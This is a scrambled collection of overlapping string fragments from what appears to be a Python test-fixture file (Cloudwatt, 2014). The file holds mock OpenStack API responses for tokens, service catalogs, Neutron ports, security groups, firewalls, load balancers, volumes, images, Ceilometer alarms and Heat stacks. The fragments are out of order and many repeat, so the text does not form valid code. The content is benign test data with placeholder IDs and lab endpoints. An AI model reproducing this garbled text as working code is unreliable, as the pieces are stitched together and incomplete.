"} LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5,",
"Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT,",
"False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None,",
"\"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True,",
"\"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID",
"PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT,",
"\"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, {",
"\"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0,",
"{ 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID,",
"\"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\"",
"\"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\":",
"'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region':",
"\"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"\"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\":",
"\"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\":",
"\"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [],",
"'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None,",
"\"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS",
"'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58',",
"[FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy",
"\"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\",",
"\"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"= [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS =",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"[ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0],",
"[], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL':",
"\"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\":",
"governing permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID =",
"\"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\":",
"\"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\":",
"\"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" }",
"'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': {",
"'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT,",
"}, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"\"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ {",
"\"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ],",
"[ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\":",
"= { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL':",
"u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel':",
"\"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\":",
"\"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ],",
"\"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS =",
"{ \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\":",
"= { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel':",
"= { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\":",
"\"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ {",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\",",
"\"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\",",
"= 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT =",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL':",
"use this file except in compliance with the License. You may obtain #",
"\"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\":",
"\"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First",
"LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [],",
"\"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ {",
"STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\":",
"\"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\"",
"PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\":",
"\"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\":",
"PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None,",
"\"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST",
"True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"],",
"25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\",",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None,",
"[ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"\"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\":",
"\"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\",",
"# Copyright © 2014 Cloudwatt # # Licensed under the Apache License, Version",
"u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain']",
"} ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\":",
"[\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS",
"for the specific language governing permissions and limitations # under the License. TOKEN_ID",
"LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\":",
"u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{",
"{ \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1],",
"}, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\":",
"], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True,",
"\"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\":",
"\"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None,",
"KIND, either express or implied. See the # License for the specific language",
"{'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"]",
"= { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume",
"\"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] }",
"'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST =",
"[ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\":",
"file except in compliance with the License. You may obtain # a copy",
"unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" }",
"= [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello",
"0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1]",
"[ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\":",
"\"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\",",
"\"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80,",
"[\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\"",
"True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser',",
"METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS",
"{ \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\":",
"} ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [",
"[], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\":",
"USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser'",
"Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL':",
"the # License for the specific language governing permissions and limitations # under",
"'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT,",
"}, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\",",
"\"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\":",
"\"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\":",
"\"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\",",
"FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\",",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\":",
"}, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\":",
"], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\":",
"{ \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\":",
"or agreed to in writing, software # distributed under the License is distributed",
"\"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS =",
"[ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" }",
"'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\",",
"\"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\",",
"\"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\":",
"}, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" }",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL':",
"\"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {},",
"\"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }",
"'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '',",
"\"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [",
"METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' },",
"License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS",
"1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\",",
"{ \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\",",
"\"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" },",
"True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\":",
"'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service',",
"{u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id':",
"\"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\":",
"\"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None,",
"\"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST",
"\"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80,",
